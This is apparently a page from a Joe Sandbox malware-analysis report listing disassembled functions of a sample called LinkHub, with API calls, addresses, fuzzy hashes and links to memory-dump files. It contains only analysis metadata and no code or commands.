Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 6b642ec63ff6d3c82f2208d2655f2e81e391796f6f1882e4d3dcf0040d879e3b
Instruction ID: fbe0bf955df98088594c23a209b593a09fde0538c0e141ccf5f1d81f88fe38f6
Opcode Fuzzy Hash: 6b642ec63ff6d3c82f2208d2655f2e81e391796f6f1882e4d3dcf0040d879e3b
Instruction Fuzzy Hash: 91A14572A003C69FEB22DF1AC8917AEBBF5EF51310F2841E9E6959B381C7389941C754

Function 00C10D26 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00C50BD4,?), ref: 00C10EE0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00C50BD4,?), ref: 00C10EF8
CLSIDFromProgID.OLE32(?,?,00000000,00C4DCE0,000000FF,?,00000000,00000800,00000000,?,00C50BD4,?), ref: 00C10F1D
_memcmp.LIBVCRUNTIME ref: 00C10F3E

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 34b44212cd89dfb6ddc223f256c9627dac93e064e3bd44236d93a286d3b563e5
Instruction ID: 6c420d5d1e32a4ce48142e952f6732476e8ffef1656dc9cc7847ded796f433a5
Opcode Fuzzy Hash: 34b44212cd89dfb6ddc223f256c9627dac93e064e3bd44236d93a286d3b563e5
Instruction Fuzzy Hash: C2812875A00109EFCB00DFD4C884EEEB7B9FF89315F204598E516AB250DB71AE86DB60

Function 00C3B0DC Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00C3B10C
Process32FirstW.KERNEL32(00000000,?), ref: 00C3B11A

Part of subcall function 00BBB329: _wcslen.LIBCMT ref: 00BBB333

Process32NextW.KERNEL32(00000000,?), ref: 00C3B1FC
CloseHandle.KERNEL32(00000000), ref: 00C3B20B

Part of subcall function 00BCE36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00BF4D73,?), ref: 00BCE395

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: e74c827c733fec5bd7ea139328876168965888b4f00422979bb0a12d605d769f
Instruction ID: ee3c007afeb1af3c1f356dec4bf0f42257f3eb31b57c9b7e1c868a1c43dfcdde
Opcode Fuzzy Hash: e74c827c733fec5bd7ea139328876168965888b4f00422979bb0a12d605d769f
Instruction Fuzzy Hash: 9B510871608301AFD310EF24C886AAFBBE8FF89754F40496DF59597251EBB0DA04CB92

Function 00BF1711 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00BF1840

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: e2cfe9dcf0d68e9b32a89bfd8d631bf943392d6a8dd858f3d84470edc3ce585f
Instruction ID: 10eb56fd96bb99b8b26f7bb012ad9d49b36d554b4989b4a1da5a609145b5aaa0
Opcode Fuzzy Hash: e2cfe9dcf0d68e9b32a89bfd8d631bf943392d6a8dd858f3d84470edc3ce585f
Instruction Fuzzy Hash: 89414B71A04149EADB207FBE8C81A7E76E8EF01770F140EE6F618D7291E7358C498361

Function 00C32533 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00C3255A
WSAGetLastError.WSOCK32 ref: 00C32568
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00C325E7
WSAGetLastError.WSOCK32 ref: 00C325F1

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: c4072d62e27b2db254d1f61547a6f018a26007473d1e616fe37e9fcaf0cd1770
Instruction ID: 212c716691cec7f43066d9ec4c4815e00cccc97770ade937c80af4254a009eb8
Opcode Fuzzy Hash: c4072d62e27b2db254d1f61547a6f018a26007473d1e616fe37e9fcaf0cd1770
Instruction Fuzzy Hash: 67419074A40200AFE720AF24C886F6A77E5AF45754F54C488F9169F2D3D6B1EE41CB90

Function 00C46CB0 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00C46D1A
ScreenToClient.USER32(?,?), ref: 00C46D4D
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00C46DBA

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: b7aad323702f7d7aa46f8c396dbbb19c9539f92f7f171b529933a1e126c31d69
Instruction ID: 7f43397e70a8fa32a6cc4ce22e6537f4663e8003a6e16e2d1d05903e627b965c
Opcode Fuzzy Hash: b7aad323702f7d7aa46f8c396dbbb19c9539f92f7f171b529933a1e126c31d69
Instruction Fuzzy Hash: 10510B74A00209EFCF24DF64D884AAE7BF6FF46360F208559F9259B294D770AE81CB51

Function 00BEB79F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56eb0b064ced76b1ffed47d8f7c88a8108ede360f905afd67325a825e0a8952a
Instruction ID: b1a8d39d3cd506709fa8e8c641ac7f6362a2e2e5b64b086a306427474b66ef9f
Opcode Fuzzy Hash: 56eb0b064ced76b1ffed47d8f7c88a8108ede360f905afd67325a825e0a8952a
Instruction Fuzzy Hash: 2441D371A00644AFE725AF79CC41B6BBBEDEB88710F1085AAF111DB791D77199018780

Function 00C2611E Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00C261C8
GetLastError.KERNEL32(?,00000000), ref: 00C261EE
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00C26213
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00C2623F

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: e7aceaf6bcb904f400370776bbf30444a9c4fa0b166e68c851a86f7a31be5c84
Instruction ID: 4b28fda0996cee32d4c9dec22541519f9ac63af7362f35167fb9e8446350aca7
Opcode Fuzzy Hash: e7aceaf6bcb904f400370776bbf30444a9c4fa0b166e68c851a86f7a31be5c84
Instruction Fuzzy Hash: F7414E39600610DFCB11EF15C545AADBBE6FF89710B188488E85A9B362CBB0FD01DF91

Function 00BEDC43 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00BD70E1,00000000,00000000,00BD8649,?,00BD8649,?,00000001,00BD70E1,8BE85006,00000001,00BD8649,00BD8649), ref: 00BEDC90
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00BEDD19
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00BEDD2B
__freea.LIBCMT ref: 00BEDD34

Part of subcall function 00BE3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00BD0165,?,?,00C211D9,0000FFFF), ref: 00BE3BC5

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 571b427844c2875ee192918a66e1da62ec7f0d3286ec13886cea45cfc0e9dc59
Instruction ID: ab6a67f051d3f23de530608fd40d508026a4f3f7e1c33709eb81c9bf237f060d
Opcode Fuzzy Hash: 571b427844c2875ee192918a66e1da62ec7f0d3286ec13886cea45cfc0e9dc59
Instruction Fuzzy Hash: 8731BC32A0024AABDB249F65CC85EEE7BE6EB40710B1441A9FC0596250EB75CD50CBA0

Function 00C1B41E Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00C1B473
SetKeyboardState.USER32(00000080), ref: 00C1B48F
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00C1B4FD
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00C1B54F

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: f612947279fad2a419e27fb851cfc63406dfa32094e3fee79edd4e5b394ad4c0
Instruction ID: 42e0ac1162677a9d55d5e9e5fed687d8b63fda78316dd1e9dabb6cb4d2b1b785
Opcode Fuzzy Hash: f612947279fad2a419e27fb851cfc63406dfa32094e3fee79edd4e5b394ad4c0
Instruction Fuzzy Hash: 4F310A70A40608AEFF31CB6588057FE7B76AB47314F04821AF4A6961D2C7748EC5BF51

Function 00C1B563 Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00C1B5B8
SetKeyboardState.USER32(00000080,?,00008000), ref: 00C1B5D4
PostMessageW.USER32(00000000,00000101,00000000), ref: 00C1B63B
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00C1B68D

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: ee9a84ce085fc9e7e0b514acf8eda48b34f0db22569ceca36b4618f13f852957
Instruction ID: 1032737a9129f49e8a1cbc5305e79af6bfe63e56f484bd9892e44fd688216c4f
Opcode Fuzzy Hash: ee9a84ce085fc9e7e0b514acf8eda48b34f0db22569ceca36b4618f13f852957
Instruction Fuzzy Hash: 16310B30A406089EFF289B6588057FEBBA6AFA7310F04422AF495961D1C7748FC5AF51

Function 00C480AE Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00C480D4
GetWindowRect.USER32(?,?), ref: 00C4814A
PtInRect.USER32(?,?,?), ref: 00C4815A
MessageBeep.USER32(00000000), ref: 00C481C6

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: f5c7361c0f203c33ff7ac368222beb23d3f3afc0c9a4c9e363aa448ba58eb600
Instruction ID: 145e38d92a0b48a73c2cecadf6c9f31f27ea07908bc61fdc331f8361a40f3962
Opcode Fuzzy Hash: f5c7361c0f203c33ff7ac368222beb23d3f3afc0c9a4c9e363aa448ba58eb600
Instruction Fuzzy Hash: BE419C34A00215DFCB11DF58C884BAEBBF5FF49314F1440AAE965AB261CB30E94ACB90

Function 00C42176 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00C42187

Part of subcall function 00C14393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C143AD
Part of subcall function 00C14393: GetCurrentThreadId.KERNEL32 ref: 00C143B4
Part of subcall function 00C14393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C12F00), ref: 00C143BB

GetCaretPos.USER32(?), ref: 00C4219B
ClientToScreen.USER32(00000000,?), ref: 00C421E8
GetForegroundWindow.USER32 ref: 00C421EE

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: eb497e808fdb1fa874b8bca4dd9eb389c81d3cc6c0443fa99590a737c918f08d
Instruction ID: bb9765efa68fe72aa7685dc72c85cb1774c3c752851978ea277d85275baf37b8
Opcode Fuzzy Hash: eb497e808fdb1fa874b8bca4dd9eb389c81d3cc6c0443fa99590a737c918f08d
Instruction Fuzzy Hash: 6B311E75D00109AFC704EFA5C881DEEB7FCEF49304B5044AAE426E7211DA71DE45CBA0

Function 00C1E8AC Relevance: 6.1, APIs: 4, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 00BB41EA: _wcslen.LIBCMT ref: 00BB41EF

_wcslen.LIBCMT ref: 00C1E8E2
_wcslen.LIBCMT ref: 00C1E8F9
_wcslen.LIBCMT ref: 00C1E924
GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00C1E92F

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: _wcslen$ExtentPoint32Text
String ID:
API String ID: 3763101759-0
Opcode ID: 401d490f165e3bc948f3defb82730f7fb82e2b5656b289fb1a3f24606fca495e
Instruction ID: ebc6aec8cfe45b55901ed326e7e38f3ba5ba823248b4991de471765d0a6a0980
Opcode Fuzzy Hash: 401d490f165e3bc948f3defb82730f7fb82e2b5656b289fb1a3f24606fca495e
Instruction Fuzzy Hash: 52219171900214AFDB10AFA8D981BEEB7F8EF46750F1440A5E914FB381E7709E418BA1

Function 00C49A25 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00BB24B0

GetCursorPos.USER32(?), ref: 00C49A5D
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00C49A72
GetCursorPos.USER32(?), ref: 00C49ABA
DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00C49AF0

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 15df6d37ff5f62a185e0f2767821c6e05a8b479f6705075c341e659e9b2135ba
Instruction ID: 2e0563906359708596b41b6aac536f54756684d96258981c68d8223a6faddc2f
Opcode Fuzzy Hash: 15df6d37ff5f62a185e0f2767821c6e05a8b479f6705075c341e659e9b2135ba
Instruction Fuzzy Hash: 1C217A35600028AFCF259F94C888FEF7BBAFB4A350F4441A5F9168B1A1D7719A50EB60

Function 00C1DB6C Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00C4DC30), ref: 00C1DBA6
GetLastError.KERNEL32 ref: 00C1DBB5
CreateDirectoryW.KERNEL32(?,00000000), ref: 00C1DBC4
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00C4DC30), ref: 00C1DC21

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 6ab4fcf73c9dadf334c7e5f0997d01298229d45b69b87b441d3aa55da4d8458c
Instruction ID: 72b216bf9697740740e31c452d274492aeded6f216e9c4426cbf0005cd17edb5
Opcode Fuzzy Hash: 6ab4fcf73c9dadf334c7e5f0997d01298229d45b69b87b441d3aa55da4d8458c
Instruction Fuzzy Hash: 602194706082019F8310EF24C8909EA77E8FE57364F104A59F4AB832A1D771DD86DB82

Function 00C4321E Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00C432A6
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00C432C0
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00C432CE
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00C432DC

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 74e4e107b8a10c2dfc9d325653419267b082a78718866cd47572e81ecd6dd69f
Instruction ID: d0875a243804f8cedd6615a2f82513999b73004ee9700a4148f0740c4a2624fe
Opcode Fuzzy Hash: 74e4e107b8a10c2dfc9d325653419267b082a78718866cd47572e81ecd6dd69f
Instruction Fuzzy Hash: 7321C131704551AFE725AB24C845FAABB95BFC1324F248258F8268B2D3C7B1EE41CBD0

Function 00C1825C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C196E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00C18271,?,000000FF,?,00C190BB,00000000,?,0000001C,?,?), ref: 00C196F3
Part of subcall function 00C196E4: lstrcpyW.KERNEL32(00000000,?,?,00C18271,?,000000FF,?,00C190BB,00000000,?,0000001C,?,?,00000000), ref: 00C19719
Part of subcall function 00C196E4: lstrcmpiW.KERNEL32(00000000,?,00C18271,?,000000FF,?,00C190BB,00000000,?,0000001C,?,?), ref: 00C1974A

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00C190BB,00000000,?,0000001C,?,?,00000000), ref: 00C1828A
lstrcpyW.KERNEL32(00000000,?,?,00C190BB,00000000,?,0000001C,?,?,00000000), ref: 00C182B0
lstrcmpiW.KERNEL32(00000002,cdecl,?,00C190BB,00000000,?,0000001C,?,?,00000000), ref: 00C182EB

Strings

cdecl, xrefs: 00C182E2

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
